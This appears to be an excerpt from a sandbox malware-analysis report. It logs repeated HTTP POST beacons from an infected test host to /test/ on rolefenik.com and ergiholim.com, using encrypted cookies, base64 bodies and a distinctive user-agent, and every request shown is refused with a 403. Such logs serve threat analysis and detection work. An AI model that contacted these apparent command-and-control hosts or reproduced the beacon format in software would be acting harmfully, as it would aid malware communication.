                                                                                                                                          2024-11-13 17:23:35 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:36 UTC754INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:36 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBEY6aFdYysGtc1lexUwe2czszcmxSm1%2FTP7s%2FBLYIm%2BWT5qEqrzNtoxowUTerLdEM%2FB5wv9uohz2%2Bv5UNh6xWtEcj1vOCpQWlwD5FApM2n%2F0owmU2rU1JPe7rcGbtcE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207356af3fd759-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=136593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22040&cwnd=32&unsent_bytes=0&cid=9e4a5e3dffdcdc74&ts=878&x=0"
                                                                                                                                          2024-11-13 17:23:36 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          80192.168.2.650077104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:37 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:37 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:37 UTC751INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:37 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fk2HRn2bSb%2BRwUO026S3Ca6xUM8Br8CcFECYvSAidACVK8OoHHGPSQGlefY7cacTaDlUHG%2F50YfW2Ti19WsohTGJYG5KEXvxGN%2BRt4dGIDCC%2BwPpJVOmKDCYAKrn9q14"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20735fbb56a918-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2228&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=1294590&cwnd=177&unsent_bytes=0&cid=38110786e51e7e48&ts=397&x=0"
                                                                                                                                          2024-11-13 17:23:37 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          81192.168.2.650078104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:38 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:38 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:39 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:39 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fqHhDDa9vWu2f6ggicUok6Ays%2BQpWh0csmu8pwtkKHF70LwAp9GKoBjEThnFbUpkXpTPnJjQSbX8ub1SsYVxrvoiGx6JrUbYX5qJUobe3ra9ST39Sqo%2BwFL2WAoHhS%2BN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073689b8bd743-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=134490&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22078&cwnd=32&unsent_bytes=0&cid=58b9efb659a76c0e&ts=603&x=0"
                                                                                                                                          2024-11-13 17:23:39 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          82192.168.2.650079104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:40 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:40 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:40 UTC753INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:40 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2BM2cNwwzt3Olr2SsX%2Br4bdl8Z1yxN%2FvFE%2FJuOoz04mQIKvdI9HOcWzZ7pfNk7tRvajTqlxWR%2BWaZKxDlBD9iSZeSjuGA3m3vbQLKzRQJVd0C47ab2ls1RaOoyvjT%2Beg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073709a56ce68-SJC
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=41658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=69520&cwnd=32&unsent_bytes=0&cid=9a1a4e3ed90fbf59&ts=549&x=0"
                                                                                                                                          2024-11-13 17:23:40 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          83192.168.2.650080104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:41 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:41 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:42 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:42 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HT%2FWTzb%2BFOnNfpD53mNEyzH2Uj2zL43XDudcNIF019IfZz3KUKD6RMI%2BIBtcCoSSRrxSADQUm%2FdcRO05SJeR8s4mtIZyoSq2uy%2FdSWXDOP3bb1lr5zqDUyvhBEHgXx2a"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207379dbf7687f-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=151871&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=20624&cwnd=32&unsent_bytes=0&cid=610d245fe586dbef&ts=798&x=0"
                                                                                                                                          2024-11-13 17:23:42 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          84192.168.2.650081104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:43 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:43 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:44 UTC750INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:44 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKUvBUaO%2BtY9Pf%2Bcuumq09WIFjp2c2o33hdYmurBZn2K99YOOBfQIXzqE9tCggIndJWGZiTjY%2BI6vhCcpq4ICWi1RHfXu%2FVjzdUZ6nVNUwUZdbtNL92rkQXhaiYDDaNv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073857fe2f5a3-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=152051&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=19850&cwnd=32&unsent_bytes=0&cid=ed0e900ea97c8292&ts=732&x=0"
                                                                                                                                          2024-11-13 17:23:44 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          85192.168.2.650082104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:44 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:44 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:45 UTC755INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:45 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LgWNhYSaoyJOWiPDTGA5g%2F7ZrrfZX4iDwuulk7M07xt0bTCEVgjxjsL%2FvVBIWY%2FZ0Kck%2FU7V9AF4uhNd99TZ92nkJgraZJG4dVQh%2F4dDwdyIOKTMOxL7YX0D%2BdSaBVRL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20738d7d266c0d-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1308&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=2112326&cwnd=251&unsent_bytes=0&cid=25c9c3ee4ded2a4e&ts=422&x=0"
